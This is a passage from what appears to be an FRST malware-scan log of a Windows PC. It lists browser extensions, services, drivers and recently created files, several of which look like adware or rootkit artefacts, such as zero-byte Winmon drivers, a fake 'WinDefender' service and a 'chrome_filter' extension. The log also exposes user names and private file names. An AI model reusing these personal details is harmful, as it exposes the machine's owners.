1\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-10] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-08] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07] CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25] CHR Extension: (Hunter: Find email addresses in seconds) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\hgmhmanijnjhaffoampdlllchpolkdnj [2019-01-30] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-08] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07] CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-10] CHR Extension: (Bazz Search SafeFinder) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-02-05] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-08] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10] CHR HKLM-x32\...\Chrome\Extension: [cncgohepihcekklokhbhiblhfcmipbdh] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10] Opera: ======= OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767" OPR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.) S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed] R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited) S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> ) R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company) S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP) R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.) R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.) R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft) R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. -> ) R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project) R2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project) R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.) R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated) S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R1 2CCD359FD649; C:\Windows\2CCD359FD649.sys [621928 2019-02-08] (韵羽健康管理咨询(上海)有限公司 -> VxDriver) R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company) R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation) S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc) S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.) S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.) S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation) R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company) S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.) S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.) R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation) S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd) R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.) S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation) R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-12] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] S3 WinRing0_1_2_0; \??\C:\Users\Stanley\AppData\Local\Temp\7ZipSfx.000\bin\tools\openhardwaremonitor\OpenHardwareMonitor.sys [X] <==== ATTENTION ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-02-12 06:47 - 2019-02-12 06:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\EpicNet Inc 2019-02-12 06:45 - 2019-02-12 06:45 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2019-02-12 06:43 - 2019-02-12 06:43 - 000003570 _____ C:\Windows\System32\Tasks\ScheduledUpdate 2019-02-12 06:37 - 2019-02-12 06:38 - 000000000 ____D C:\AdwCleaner 2019-02-12 06:36 - 2019-02-12 06:36 - 007316688 _____ (Malwarebytes) C:\Users\Stanley\Downloads\AdwCleaner.exe 2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt 2019-02-12 05:53 - 2019-02-12 07:09 - 000000000 ____D C:\Users\Stanley\Downloads\FRST 2019-02-12 05:33 - 2019-02-12 07:09 - 000000000 ____D C:\FRST 2019-02-12 05:24 - 2019-02-12 05:24 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2019-02-12 05:24 - 2019-02-12 05:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes 2019-02-12 05:23 - 2019-02-12 05:23 - 000000000 ____D C:\Program Files\Malwarebytes 2019-02-12 05:23 - 2018-04-26 05:36 - 000152184 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys 2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk 2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500 2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard 2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer 2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages 2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator 2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini 2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe 2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google 2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss 2019-02-09 01:51 - 2018-05-22 23:04 - 075629776 _____ (Malwarebytes ) C:\Users\Stanley\Desktop\MalwareBytes-setup-consumer-3.5.1.2522-1.0.365-1.0.5188.exe 2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk 2019-02-09 00:58 - 2019-02-12 06:42 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent 2019-02-09 00:25 - 2019-02-12 05:23 - 000000000 ____D C:\ProgramData\Malwarebytes 2019-02-08 23:58 - 2019-02-08 23:58 - 000003194 _____ C:\Windows\System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} 2019-02-08 22:53 - 2019-02-12 06:43 - 000003242 _____ C:\Windows\System32\Tasks\csrss 2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe 2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold## 2019-02-08 22:50 - 2019-02-08 22:50 - 000621928 _____ (VxDriver) C:\Windows\2CCD359FD649.sys 2019-02-08 22:49 - 2019-02-08 22:49 - 000000000 ____D C:\Users\Stanley\AppData\Local\{01801827-6513-4a10-9443-a405dbafb4d3} 2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk 2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media 2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe 2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe 2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer 2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt 2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft 2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft 2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files 2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe 2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe 2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload 2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI 2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux 2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions 2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions 2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog 2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe 2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio 2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe 2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios 2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery 2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer 2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare 2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni 2019-02-05 00:50 - 2019-02-05 00:50 - 007878144 _____ C:\Users\Stanley\AppData\Local\agent.dat 2019-02-05 00:50 - 2019-02-05 00:50 - 002037348 _____ C:\Users\Stanley\AppData\Local\Ran-Lex.tst 2019-02-05 00:50 - 2019-02-05 00:50 - 001895382 _____ C:\Users\Stanley\AppData\Local\Dingzap.bin 2019-02-05 00:50 - 2019-02-05 00:50 - 000278509 _____ C:\Users\Stanley\AppData\Local\Dingbam.tst 2019-02-05 00:50 - 2019-02-05 00:50 - 000126464 _____ C:\Users\Stanley\AppData\Local\noah.dat 2019-02-05 00:50 - 2019-02-05 00:50 - 000070896 _____ C:\Users\Stanley\AppData\Local\Config.xml 2019-02-05 00:50 - 2019-02-05 00:50 - 000005568 _____ C:\Users\Stanley\AppData\Local\md.xml 2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics 2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Ran-Lex.exe 2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Dingbam.exe 2019-02-05 00:49 - 2019-02-05 01:33 - 000722944 _____ C:\Users\Stanley\AppData\Local\sham.db 2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat 2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment 2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0 2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA 2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe 2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios 2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple 2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg 2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg 2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004 2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog 2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios 2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer 2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry 2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages 2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold 2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google 2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf 2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf 2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt 2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp 2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive 2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf 2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf 2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf 2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip 2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf 2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk 2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes 2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod 2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 